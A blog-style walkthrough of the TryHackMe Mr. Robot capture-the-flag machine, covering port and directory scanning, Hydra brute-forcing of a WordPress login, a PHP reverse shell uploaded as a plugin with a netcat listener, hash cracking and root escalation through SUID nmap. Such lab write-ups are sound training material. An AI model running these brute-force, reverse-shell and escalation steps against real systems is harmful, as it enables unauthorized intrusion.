In this blog post, I'll walk you through my experience tackling the Mr. Robot CTF virtual machine, available on TryHackMe. The primary objective is to uncover three hidden flags by exploiting vulnerabilities in the system.
The challenge centers around exploiting a WordPress installation with weak credentials and leveraging outdated software with known vulnerabilities. Specifically, we'll focus on:
Weak Credentials: The use of common or default usernames and passwords makes the system susceptible to brute-force attacks.
Outdated Software: Running outdated versions of software like Nmap can expose the system to privilege escalation vulnerabilities.
I began by adding the VM's IP address to my /etc/hosts file for easier reference, assigning it the domain mrrobot.thm.
Next, I performed an Nmap scan to identify open ports and services:
nmap -sC -sV -oA mrrobot mrrobot.thm
The scan revealed:
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
443/tcp open ssl/ssl Apache httpd (SSL-only mode)
With HTTP and HTTPS services running, I decided to explore the web server. While doing so, I initiated a Gobuster scan to discover hidden directories:
gobuster dir -u http://mrrobot.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.txt
The Gobuster results indicated a WordPress installation with several accessible directories, including /robots.txt, which contained the first flag and a fsocity.dic file—a wordlist likely useful for brute-forcing.
Navigating to /wp-login, I attempted a dummy login and observed that WordPress specified when a username was invalid. Using Burp Suite, I inspected the POST parameters and then employed Hydra to brute-force the username:
hydra -L fsocity.dic -p test mrrobot.thm http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http://mrrobot.thm/wp-admin/&testcookie=1:F=Invalid username"
This revealed the username Elliot. I then proceeded to brute-force the password:
hydra -l Elliot -P fsocity.dic mrrobot.thm http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http://mrrobot.thm/wp-admin/&testcookie=1:S=302"
The password ER28-0652 was discovered. After logging in, I found that I could upload new plugins. I modified a PHP reverse shell script to include WordPress plugin headers, zipped it, and uploaded it as a new plugin.
Before activating the plugin, I set up a Netcat listener on my local machine:
nc -lvp 4444
Upon activating the plugin, I received a reverse shell as the daemon user. To improve the shell's usability, I upgraded it using Python:
python -c 'import pty; pty.spawn("/bin/bash")'
Exploring /home/robot, I found key-2-of-3.txt (which I couldn't read due to permissions) and password.raw-md5, containing a hashed password. I cracked this hash using Hashcat:
hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt
The cracked password allowed me to switch to the robot user:
su - robot
To escalate privileges to root, I uploaded and ran LinEnum, which highlighted that /usr/local/bin/nmap had the SUID bit set. Knowing that older versions of Nmap have an interactive mode that can be exploited, I executed:
nmap --interactive
!sh
This provided a root shell, allowing me to access the final flag in /root/key-3-of-3.txt.